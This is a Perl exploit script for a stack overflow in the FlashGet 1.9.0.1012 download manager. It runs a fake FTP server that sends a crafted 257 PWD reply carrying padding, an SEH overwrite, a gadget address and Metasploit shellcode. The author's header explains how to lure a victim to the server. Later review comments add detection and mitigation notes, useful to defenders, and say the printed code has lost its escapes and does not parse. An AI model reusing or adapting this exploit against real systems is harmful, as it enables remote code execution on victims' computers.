
flashget190-overflow.txt

Posted on 15 August 2008

#!/usr/bin/perl
# FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit
# Coded By SkOd, skod.uk at gmail dot com
# Tested over Windows XP sp1 Hebrew
# link your victim to - ftp://localhost/somefile.TORRENT - over internet explorer.
##
# PoC by Krystian Kloskowski (h07) <h07@interia.pl>
# http://milw0rm.com/exploits/6240
##
# special thanks to a friend of mine who helped me
#
# NOTE(review): what this listing does, for defenders reading it.
#   - It is a fake FTP server. It binds $HOST:$LISTEN_PORT, greets the
#     client with a 220 banner, answers USER/PASS with canned 331/230
#     replies, and answers the next command (PWD in the intended flow)
#     with a 257 reply whose body is $PAYLOAD. The overflow is in the
#     client's handling of an over-long 257 reply, not in this script.
#   - $PAYLOAD (built under "Creating Payload") is padding + an SEH record
#     + shellcode + a NOP run; from the constants below its intended size
#     is 324 + 8 + 160 + 300 bytes.
#   - Detection: a 257 reply hundreds of bytes long where a genuine PWD
#     reply is a short quoted path; an "FTP server" on a host that should
#     not run one; FlashGet being driven to an attacker-controlled ftp://
#     URL from a browser.
#   - Mitigation: the page names only the affected client version
#     (1.9.0.1012) and gives no fixed release; treat that version as
#     vulnerable and keep download managers off untrusted FTP servers.
#   - Listing fidelity: as printed, the 257 send line has unbalanced
#     quotes and the "x.." byte strings are plain ASCII, so the text as
#     shown does not parse; read it as documentation of the technique.
#   - No `use strict`/`use warnings`; $PAYLOAD, $LISTEN_PORT,
#     $clientSocket, $isPayloadSent and $recvBuffer are undeclared
#     package globals.
use IO::Socket;
####################################[ Parameters ]########################################
# Stage delivered inside the 257 reply. Per the metasploit comment below it
# is a 160-byte win32_exec stub that launches calc (a benign demonstration
# payload); as printed here the "x.." sequences are ASCII text, not raw bytes.
my $SHELLCODE = "x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x6b".
"xa3x03x10x83xebxfcxe2xf4x97x4bx47x10x6bxa3x88x55".
"x57x28x7fx15x13xa2xecx9bx24xbbx88x4fx4bxa2xe8x59".
"xe0x97x88x11x85x92xc3x89xc7x27xc3x64x6cx62xc9x1d".
"x6ax61xe8xe4x50xf7x27x14x1ex46x88x4fx4fxa2xe8x76".
"xe0xafx48x9bx34xbfx02xfbxe0xbfx88x11x80x2ax5fx34".
"x6fx60x32xd0x0fx28x43x20xeex63x7bx1cxe0xe3x0fx9b".
"x1bxbfxaex9bx03xabxe8x19xe0x23xb3x10x6bxa3x88x78".
"x57xfcx32xe6x0bxf5x8axe8xe8x63x78x40x03x53x89x14".
"x34xcbx9bxeexe1xadx54xefx8cxc0x62x7cx08xa3x03x10";
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
# The Host that will be listen to the Download request from Flashget
my $HOST = '127.0.0.1'; #your own ip
#################################[Don't Edit From Here]#####################################
######################################[Defines]#############################################
# Filler written before the SEH record; 324 is the offset the author found
# for this client version (not derived anywhere in this file).
my $PADDING_CHAR = "A";
my $PADDING_SIZE = 324;
#The code will return to next_seh_chain so i make it as jump and invalid address
#so it will be decoded as last in chain.
my $NEXT_SEH_IN_CHAIN = "xEBx06xFFxFF"; # JMP +6
#Settings Return Address
my $CUR_SEH_ADDRESS = "x8Bx19x01x10"; # Chosen Ret Addr is : 0x1001198B FlashGetFGBTCORE.dll v1.0. 0.36
# 1001198B 5E POP ESI
# 1001198C 5B POP EBX
# 1001198D C3 RETN
# Building SEH Block
# Eight bytes that overwrite the exception registration record:
# next-pointer first, then handler address.
my $SEH_BLOCK = $NEXT_SEH_IN_CHAIN . $CUR_SEH_ADDRESS;
#Creating Payload
# Layout: padding, SEH record, shellcode, NOP run. $PAYLOAD is never
# declared, so it is a package global.
$PAYLOAD = $PADDING_CHAR x $PADDING_SIZE;
$PAYLOAD .= $SEH_BLOCK;
$PAYLOAD .= $SHELLCODE;
$PAYLOAD .= "x90" x 300; #Putting alot of nops so the code will get Exception that we write after stack is over
#witch will make it to call our code
# Standard FTP control port; binding it needs privilege on most systems.
$LISTEN_PORT = 21;
##########################################################################
print "# FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit ";
print "# Coded By SkOd, skod.ukx40gmailx2ecom ";
# NOTE(review): indirect-object syntax; IO::Socket::INET->new(...) is the
# conventional form. The constructor's return value is not checked, so a
# failed bind (port in use, no privilege) only surfaces at accept().
my $serverSocket = new IO::Socket::INET (Listen => 1, LocalAddr => $HOST, LocalPort => $LISTEN_PORT, Proto => 'tcp');
do {
    print " [~] listening... ";
    # Blocks until one client connects; accept() failure is not handled.
    $clientSocket = $serverSocket->accept();
    print "[+] New Connection Recived ";
    $clientSocket->send("220 WELCOME! ");
    $isPayloadSent = 0;
    # One command/reply exchange per turn; the loop ends after the first
    # command that is neither USER nor PASS.
    while($isPayloadSent == 0) {
        # recv's return value is unchecked: if the peer has gone away,
        # $recvBuffer is presumably empty, matches neither branch below,
        # and the payload is written to a dead socket.
        $clientSocket->recv($recvBuffer,1024);
        print "[~] Recived: " . $recvBuffer;
        # Unanchored, case-sensitive matches anywhere in the 1024-byte read.
        if($recvBuffer =~ /USER/) {
            $clientSocket->send("331 Password required for l33t ");
        }
        elsif($recvBuffer =~ /PASS/) {
            $clientSocket->send("230 User l33t logged in. ");
        }
        else {
            # Any other command gets the oversized 257 reply carrying
            # $PAYLOAD. As printed, the inner quotes are unescaped and this
            # line does not parse.
            $clientSocket->send("257 "$PAYLOAD" ");
            print("[+] The payload has been sent... ");
            $isPayloadSent = 1;
        }
    }
    $clientSocket->close();
} while (true); # bareword `true` is the string 'true' without strict: loops forever

 
